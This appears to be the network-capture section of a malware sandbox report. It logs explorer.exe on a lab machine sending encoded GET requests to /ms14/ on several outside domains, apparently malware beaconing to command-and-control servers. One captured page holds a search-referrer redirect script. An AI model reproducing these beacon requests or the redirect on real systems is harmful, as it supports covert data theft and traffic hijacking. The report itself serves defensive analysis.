Aug 2, 2023 20:35:21.728425026 CEST	58	IN	Data Raw: 60 3f f1 a9 69 53 bc 43 72 b4 4c b0 d8 74 16 b0 d1 2c c3 ec 0d fd 95 d7 09 22 2b 10 04 74 27 3b d7 3f c0 49 f2 c3 03 d3 3b eb fc 39 91 96 9e b3 fb 12 f0 aa b9 9c 73 43 32 2b 0d 7c e9 42 13 57 e7 b4 6f 70 a0 42 77 bc d2 d0 18 0c 76 10 72 96 2b fa Data Ascii: `?iSCrLt,"+t';?I;9sC2+\|BWopBwvr+VuuT7nSS!f.PWn`Aw,RmbAl<#"xhgV>\x!l1j#![MM:]N7Tq)hl)(4'TZY
Aug 2, 2023 20:35:21.728488922 CEST	60	IN	Data Raw: db 2d ba 6f fe 31 74 6f e5 a9 e7 8e bd 09 24 ca 6e 1f 64 ee d3 4a 0e dc 77 0b c9 11 f6 0f 29 52 0d 59 9b e2 04 2e 69 18 a0 8f de 83 93 ea 23 7c bf 72 12 57 b5 f5 55 16 8b 97 82 ef f3 2e 8d 67 15 30 a9 13 31 36 af 63 78 35 75 3b dc 69 11 d3 b2 43 Data Ascii: -o1to$ndJw)RY.i#\|rWU.g016cx5u;iC[;_987ElC6t";zpNwJV("4B#D\pMV#=g^o~wf>+_T[+=~=#haE2n`M?
Aug 2, 2023 20:35:21.728553057 CEST	61	IN	Data Raw: b6 a1 c8 f7 c5 4f 3e 51 74 d9 96 fb c2 21 e2 79 25 c5 27 4d f4 73 8b 35 02 f0 ab 4a 0f e6 65 af 1c d5 dd 96 cb 49 a0 3d 99 77 95 7c 8e 8e 36 e4 db 9b 4e 8e 7e ef fd f6 0f f0 ab 7c e6 9b eb e0 9d 1f 0c 26 e4 03 2a f5 f5 aa a8 d4 f4 e9 bb b9 33 da Data Ascii: O>Qt!y%'Ms5JeI=w\|6N~\|&*39_\')R'xbU;vP9Di9/NGA^P}~SQe-HwsGZclyy#\|l0]K1^W
Aug 2, 2023 20:35:21.728619099 CEST	62	IN	Data Raw: 49 90 3c ee bb 3c 6a 38 45 23 15 83 42 bc 6e 70 fb 9f eb 63 ff a7 29 a4 7b 06 b4 bd 50 a8 42 4d 07 10 3a 90 21 f6 32 7f ae bf 2e 14 95 a8 ea a2 e8 bf e3 07 1b 6c 0d 59 07 87 ef 62 de a5 d3 00 68 33 67 13 50 e8 80 04 54 a4 45 f5 38 03 c0 19 a8 f4 Data Ascii: I<<j8E#Bnpc){PBM:!2.lYbh3gPTE8NQ\|9~Fyceh;RCuR2>qt.sYy7:2y4^@b7dDpv.(RR?l/)`hfM&_l$gPj>OhR
Aug 2, 2023 20:35:21.728683949 CEST	64	IN	Data Raw: 6b 4e cb b7 53 c9 d8 ad c3 65 80 ae c7 bd 6b bf f6 a6 34 b7 26 ad 1c 05 82 b6 00 bb d1 bc 7a 88 31 95 77 e3 99 2a d8 b6 d6 a7 3c ed 17 ff 92 24 e6 72 30 87 9e 76 4c d2 40 14 03 de 80 58 d4 6d 56 1f 8b 97 84 39 50 a8 94 9e fb f3 4d 22 22 36 1e 42 Data Ascii: kNSek4&z1w<$r0vL@XmV9PM""6BKf=\}L8O5@k{IO[z{aq]5F.TY6_Ur$gCYak^~Tu2r$5 HY=64n}?cbvD3
Aug 2, 2023 20:35:21.728749037 CEST	65	IN	Data Raw: 74 b4 18 61 3a 81 29 c8 8b d3 bb 65 91 42 35 30 55 22 71 81 fb ce 0d c1 21 4e 83 d1 dc ac 7f 02 e2 d0 9f 84 75 2e 2b 8b cd e1 16 3c 71 e9 8e af d6 5d 32 55 a4 bb b3 26 1b e9 34 33 45 46 c2 f7 3b 2b 9f 5a 59 33 e3 4c 20 c7 0b 31 38 b1 56 17 fd e3 Data Ascii: ta:)eB50U"q!Nu.+<q]2U&43EF;+ZY3L 18VT)RdYF}&y!.^L %5,5y+nmdYgztl74!=89hYuWtu0)CS^JABMhK*ByL
Aug 2, 2023 20:35:21.728815079 CEST	66	IN	Data Raw: bd 70 04 20 cb 1b a7 64 9b 04 a9 a9 d1 6b 83 6b 95 95 77 1e 7a 3a eb bb e9 f2 e4 45 97 ae 8e 93 4a 14 2b d1 af 9c 1b 48 f0 be ea 1f 2d d8 84 52 5f 58 c8 6f b4 97 03 82 07 de 40 e1 d5 0d dc 8e 43 b8 dd 41 93 33 20 8c 52 2d 13 8d 85 6d f9 80 c3 2e Data Ascii: p dkkwz:EJ+H-R_Xo@CA3 R-m.nSlu0'#aPB0~DU@?PQ&MiN08.v(yL\C$h^9mv\-8I8\BZ\sg"`YtF9p}-KGXb:
Aug 2, 2023 20:35:21.728884935 CEST	68	IN	Data Raw: fe 95 10 47 cc ab 6a a7 c9 05 54 d0 bc 36 a4 8c 8f a5 d4 43 6a 22 e0 90 76 71 f9 e1 7f c1 c5 66 59 8f b4 09 95 4f b7 0e 46 85 09 ec 08 5d a8 af 03 7a df 1d bd bb ab 10 0a a8 d3 fa 9d b3 c3 31 15 85 f5 4a 4a 7a 79 e6 04 47 03 20 fc 8b bf c6 4e 6a Data Ascii: GjT6Cj"vqfYOF]z1JJzyG NjBryd/\x+\GMsH'7gkGWxM2kBhFE)\|#V\.dnvu?ay[&H+ UR_M<$EA=!2^
Aug 2, 2023 20:35:21.854820013 CEST	69	IN	Data Raw: cd 4c fa 71 5f f4 55 42 5c b2 2c 61 dc 10 24 b6 4e 1f 96 dc 33 28 2b bf 24 2e 2b a1 b6 4a fb fb 19 3c 3a 71 b9 82 e4 f1 a6 61 2c 75 40 7c 8d a3 c7 51 93 c0 d4 6c 48 0a f5 9c 0f 3f e8 72 ef dc a5 59 f9 e2 60 ee 75 95 c1 78 09 0e dd ff 7f 71 74 1e Data Ascii: Lq_UB\,a$N3(+$.+J<:qa,u@\|QlH?rY`uxqtKxl~,TewS=!]:2B58;^%I)zs+rD11RYyOm2j>dwIAdf;NP"SCiHpKuQ;\|r(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49867	199.188.104.120	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:36:06.692982912 CEST	2742	OUT	GET /ms14/?1b-=ZV58cyt7lud3nw6eSnCnw3hvj6dUBdrYkOi4GK43GwnmJSRRdDKHOou2s3Asj9CH0dO3&5jjx=X41P HTTP/1.1 Host: www.qwevqgjw.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:36:06.853930950 CEST	2743	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Aug 2023 18:36:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 33 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e e3 80 90 e5 8f 97 e5 a4 a7 e5 93 a5 e7 89 88 e6 9d 83 e4 bf 9d e6 8a a4 ef bc 8c e4 bc 98 e6 83 a0 e6 b4 bb e5 8a a8 e8 b6 b3 e5 a4 9f e7 bb 99 e5 8a 9b e3 80 91 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 65 64 35 38 35 33 31 30 37 38 37 64 35 62 31 37 64 35 35 35 37 35 36 38 33 65 30 34 61 65 30 38 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 67 65 78 70 20 3d 20 2f 5c 2e 28 62 61 69 64 75 7c 67 6f 6f 67 6c 65 7c 79 6f 75 64 61 6f 7c 79 61 68 6f 6f 7c 62 69 6e 67 7c 73 6f 7c 62 69 73 6f 7c 67 6f 75 67 6f 75 7c 69 66 65 6e 67 7c 69 76 63 7c 73 6f 6f 75 6c 65 7c 6e 69 75 68 75 7c 62 69 73 6f 29 28 5c 2e 5b 61 2d 7a 30 2d 39 5c 2d 5d 2b 29 7b 31 2c 32 7d 5c 2f 2f 69 67 3b 0a 76 61 72 20 77 68 65 72 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 3b 0a 69 66 20 28 72 65 67 65 78 70 2e 74 65 73 74 28 77 68 65 72 65 29 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 65 68 63 33 35 2e 63 6f 6d 2f 27 0a 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 3e 0a 0a 64 69 76 7b 77 69 64 74 68 3a 34 30 30 70 78 3b 68 65 69 67 68 74 3a 34 30 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 20 7d 0a 0a 69 6d 67 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 0a 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1<!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title></title><script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?ed585310787d5b17d55575683e04ae08"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script type="text/javascript">var regexp = /\.(baidu\|google\|youdao\|yahoo\|bing\|so\|biso\|gougou\|ifeng\|ivc\|sooule\|niuhu\|biso)(\.[a-z0-9\-]+){1,2}\//ig;var where = document.referrer;if (regexp.test(where)) { window.location.href = 'http://www.ehc35.com/'}</script><style>div{width:400px;height:400px;border:1px solid #000; }img{width:100%;height:100%;}</style></head></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49883	23.227.38.65	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:39:53.025229931 CEST	2810	OUT	GET /ms14/?1b-=YHJhEiWoifUmsuRZQbUaqtt89OE4JOQRavFR3vIQ0joiEOwiU7X+YqSmQ5n9nRvRM2aG&5jjx=X41P HTTP/1.1 Host: www.lojaasoriginais.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:39:53.051467896 CEST	2811	IN	HTTP/1.1 403 Forbidden Date: Wed, 02 Aug 2023 18:39:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 300 X-Sorting-Hat-ShopId: 79040119085 X-Dc: gcp-europe-west3 X-Request-ID: 9b512c4d-7850-493c-b96d-8b21dfec2e2f X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OeqPoKtttstQG8BVcOPkW6TdPc49wdMyx%2FsV8Ll0ZdvhhPuzrDQjHykHqr9T8fic5DtTtUSk6LoZw%2FOAwKFq6%2FFUKjU44WmfsxRhgF0wWSGBrGOQYM7FYCcMm1PQlDnjfED2ebruf8Or2phs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=16.999960 Server: cloudflare CF-RAY: 7f0872346eff30d2-FRA alt-svc: h3=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{p
Aug 2, 2023 20:39:53.051506042 CEST	2813	IN	Data Raw: 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 Data Ascii: adding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0
Aug 2, 2023 20:39:53.051534891 CEST	2814	IN	Data Raw: 44 75 20 68 61 72 20 69 6b 6b 65 20 74 69 6c 6c 61 74 65 6c 73 65 20 74 69 6c 20 c3 a5 20 c3 a5 70 6e 65 20 64 65 74 74 65 20 6e 65 74 74 73 74 65 64 65 74 22 0a 20 20 7d 2c 0a 20 20 22 74 68 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 Data Ascii: Du har ikke tillatelse til pne dette nettstedet" }, "th": { "title": "", "content-title": "
Aug 2, 2023 20:39:53.051562071 CEST	2815	IN	Data Raw: e2 80 99 61 75 74 6f 72 69 7a 7a 61 7a 69 6f 6e 65 20 70 65 72 20 61 63 63 65 64 65 72 65 20 61 20 71 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 70 6c 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 4f 64 6d Data Ascii: autorizzazione per accedere a questo sito web" }, "pl": { "title": "Odmowa dostpu", "content-title": "Nie masz uprawnie dostpu do tej strony internetowej" }, "sv": { "title": "tkomst nekad", "content-title":
Aug 2, 2023 20:39:53.051588058 CEST	2816	IN	Data Raw: 69 7a 20 79 6f 6b 2e 22 0a 20 20 7d 2c 0a 20 20 22 7a 68 2d 43 4e 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 e8 ae bf e9 97 ae e8 a2 ab e6 8b 92 e7 bb 9d 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e6 Data Ascii: iz yok." }, "zh-CN": { "title": "", "content-title": "" }, "nl": { "title": "Toegang geweigerd", "content-title": "Je hebt geen toestemming voor toegang tot deze website" }};
Aug 2, 2023 20:39:53.051609039 CEST	2816	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	49884	199.59.243.224	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:40:13.680946112 CEST	2817	OUT	GET /ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&5jjx=X41P HTTP/1.1 Host: www.aniwatch.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:40:13.875751972 CEST	2819	IN	HTTP/1.1 200 OK date: Wed, 02 Aug 2023 18:40:13 GMT content-type: text/html; charset=utf-8 content-length: 1294 x-request-id: d3902411-760c-4585-9a23-2343be3c0eaf cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lnOnNxJ944xDim6yLfIwtlna8N9e//kL2ws4QINRUXqRi36+Km6fZavwHstXA1sXY8WieUEfzGHFi9hYRlLcHw== set-cookie: parking_session=d3902411-760c-4585-9a23-2343be3c0eaf; expires=Wed, 02 Aug 2023 18:55:13 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6c 6e 4f 6e 4e 78 4a 39 34 34 78 44 69 6d 36 79 4c 66 49 77 74 6c 6e 61 38 4e 39 65 2f 2f 6b 4c 32 77 73 34 51 49 4e 52 55 58 71 52 69 33 36 2b 4b 6d 36 66 5a 61 76 77 48 73 74 58 41 31 73 58 59 38 57 69 65 55 45 66 7a 47 48 46 69 39 68 59 52 6c 4c 63 48 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lnOnNxJ944xDim6yLfIwtlna8N9e//kL2ws4QINRUXqRi36+Km6fZavwHstXA1sXY8WieUEfzGHFi9hYRlLcHw==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
Aug 2, 2023 20:40:13.875868082 CEST	2820	IN	Data Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDM5MDI0MTEtNzYwYy00NTg1LTlhMjMtMjM0M2JlM2MwZWFmIiwicGFnZV90aW1lIjoxNjk

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.11.20	49885	38.53.14.66	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:40:36.330481052 CEST	2821	OUT	GET /ms14/?1b-=zE+GbO9DWh6B2kXf3cE5o589bQHva9Su9PKDhuKrO6jzYqtjY6jl14E5kwylDApimKPF&5jjx=X41P HTTP/1.1 Host: www.genqaagz.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:40:36.781248093 CEST	2821	OUT	GET /ms14/?1b-=zE+GbO9DWh6B2kXf3cE5o589bQHva9Su9PKDhuKrO6jzYqtjY6jl14E5kwylDApimKPF&5jjx=X41P HTTP/1.1 Host: www.genqaagz.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:40:36.948260069 CEST	2822	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Aug 2023 18:40:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 65 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e5 85 a8 e5 9b bd e5 ae 98 e6 96 b9 e5 ae a2 e6 9c 8d e7 94 b5 e8 af 9d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 37 62 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 68 65 72 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 61 69 64 75 2e 63 6f 6d 2f 73 65 6f 2f 73 6b 69 6e 2f 69 6d 61 67 65 2f 34 30 30 2e 6a 70 67 27 29 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 32 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 68 65 72 6f 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 38 29 3b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 Data Ascii: 1e58<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title></title> <style> body { font-family: Arial, 